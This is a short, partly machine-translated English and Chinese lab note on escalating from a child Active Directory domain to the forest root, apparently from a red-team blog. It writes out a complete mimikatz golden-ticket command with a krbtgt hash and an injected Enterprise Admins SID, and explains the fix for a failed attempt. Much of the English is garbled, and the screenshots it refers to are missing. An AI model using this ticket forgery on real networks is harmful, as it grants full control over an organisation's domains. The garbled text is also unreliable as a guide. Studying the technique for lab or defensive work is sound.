------------ ------------ restore content begins
Suppose a domain zhong.czf Dc.zhong.czf domain is the domain controller pp.zhong.czf subdomain (domain tree configured and DC) (field control is pp.pp.zhong.czf) the domain ppo. pp.zhong.czf is below pp subdomain (forest domain and configured pp)
Here, when an existing domain structures below a certain selected domain forest
Constituting such a domain
Thinking
Ppo get permission had been just within the above domain controller pp landing
At this point we are able to access the root domain controller win but certainly not the authority ipc
When I was naive to think that the success of the time
kerberos::golden /user:Administrator /domain:pp.zhong.czf /sid:S-1-5-21-3321026355-1170224481-604632441 /krbtgt:758c84a842111552468551c16662885f /sids:S-1-5-21-3267649711-2093864886-1768988539-519 /ptt
This occurred
The reason is the second time sid sid enterprise administrators to accede wrong
正确的时候这里应该出现一个extra Sid
这里需要解释的是 ppo做为pp域内的域成员 需要的是 pp.zhong.czf domain admin 的SID 和krbtgt账户 第二个sid是 zhong.czf域的 extr admin SID-519
第二个是sids
正确的样子
文献参考
writeup http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/